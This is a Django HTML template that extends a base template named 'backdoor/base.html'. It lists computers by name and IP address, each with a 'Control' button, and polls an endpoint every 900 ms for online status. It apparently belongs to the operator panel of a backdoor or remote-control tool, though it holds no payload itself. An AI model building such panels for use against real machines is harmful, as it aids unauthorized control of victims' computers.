{% include 'backdoor/base.html' %}
{% block content %}
{% for computer in computers %}
    <div class="computerdiv">
        <a style="text-decoration:none;" href="{% url 'computer-detail' pc_id=computer.id %}">
        <div id="online-status-{{computer.id}}">
            
        </div>
        <h4 style="color:black">{{computer.pc_name}}</h4>
        <h4 style="color:grey;font-size:16px;">{{computer.ip_addr}}</h4>
        <button type="button" class="btn btn-dark">Control</button>
        </a>
        </div>
            <script>$(document).ready(function(){
                setInterval(function(){
                    $.ajax({
                        type:'GET',
                        url : "{% url 'ajax-pc' computer.id %}",
                        success: function(response){
                            let element = document.getElementById("online-status-{{computer.id}}")
                            element.innerText = response.data;
                            element.classList.add(response.data);               
                        },
                        error: function(response)
                        {
                            console.log("b");
                        }
                    });
                },900);
            });</script>
    </div>
{% endfor %}
{% endblock content %}